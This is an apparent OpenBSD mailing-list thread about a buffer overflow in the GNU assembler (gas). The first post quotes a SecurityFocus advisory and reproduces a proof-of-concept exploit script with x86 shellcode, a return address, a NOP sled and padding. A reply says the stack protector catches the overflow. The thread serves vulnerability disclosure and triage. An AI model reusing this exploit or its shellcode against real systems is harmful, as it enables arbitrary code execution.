gas Buffer Overflow

classic Classic list List threaded Threaded
2 messages Options
Reply | Threaded
Open this post in threaded view
|

gas Buffer Overflow

Sebastian Rother
http://www.securityfocus.com/bid/19555

"GNU binutils GAS (GNU assembler) is prone to a buffer-overflow
vulnerability because it fails to properly bounds-check user-supplied
input before copying it to an insufficiently sized memory buffer.

Remote attackers may crash the application or execute arbitrary machine
code in the context of the application."

Exploit from Sec-Focus:

#!/bin/sh
#
# gas overflow poc, <[hidden email]>

returnaddr='\xc4\xea\xff\xbf'
shellcode='\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0
\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff/bin/id'

printf '#include <stdio.h>\n'
printf '#define EGG "%s"\n' "$shellcode"
printf '#define RET "%s"\n' "$returnaddr"
printf '#define NOP "%s"\n' "`perl -e 'print "\\\x90"x100'`"
printf '#define PAD "%s"\n' "`perl -e 'print "A"x1990'`"

cat << __EOF__
#include <stdio.h>

int main (int argc, char **argv)
{
                __asm__ (PAD RET NOP EGG);
}
__EOF__


I didn`t checked if it was fixed by the "patches" OpenBSD ships with
gcc but I don`t think so.
It would be neat if somebody with more knowledge would be bale to tell
me if oBSD is affected or not. :)

Kind regards,
Sebastian

Reply | Threaded
Open this post in threaded view
|

Re: gas Buffer Overflow

Miod Vallat
> I didn`t checked if it was fixed by the "patches" OpenBSD ships with
> gcc but I don`t think so.

The problem exists but gets caught by propolice.

Miod